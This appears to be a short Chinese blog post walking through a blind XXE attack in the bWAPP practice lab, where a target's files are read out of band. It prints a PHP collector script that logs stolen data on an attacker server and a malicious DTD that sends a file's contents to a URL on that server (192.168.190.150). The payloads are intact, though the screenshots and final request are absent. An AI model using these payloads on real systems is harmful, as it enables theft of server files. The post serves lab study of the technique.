2019-11-19:无返回的盲型xxe,使用带外读取数据

文章资料来源于网络,仅供参考,学习使用

复现盲型xxe

实验环境:bwapp,xxe关,注释掉了返回值

准备读取的flag.txt文件为

 

通过利用服务器外带数据方法步骤

1,攻击机服务器新建两个文件,一个php文件,一个dtd文件

php用来接收数据,代码为:

<?php

$xxe = $_GET['xxe'];

$log = fopen('xxe.txt','a');

fwrite($log,$xxe.'\n');

fclose($log);

?>

 

dtd文件用来向php文件发起请求,文件里面的&#x25;是html实体编码代码表示为%

<!ENTITY % xxe

"<!ENTITY &#x25; send SYSTEM 'http://192.168.190.150/test.php?xxe=%file;'>"

%xxe;

 

确定准备的两个文件,都是可以访问的

 

 

 

2,访问有xxe漏洞的页面,抓取数据包

 

3,发送如下数据包,虽然没有显示,但是可以到准备文件的服务器中,会建立有一个xxe.txt文件,写入了xxe传来的数据

 

 

数据已经写入到攻击机服务器中

 

 


   

posted @ 2019-11-19 20:03  bonga  阅读(1100)  评论(0编辑  收藏  举报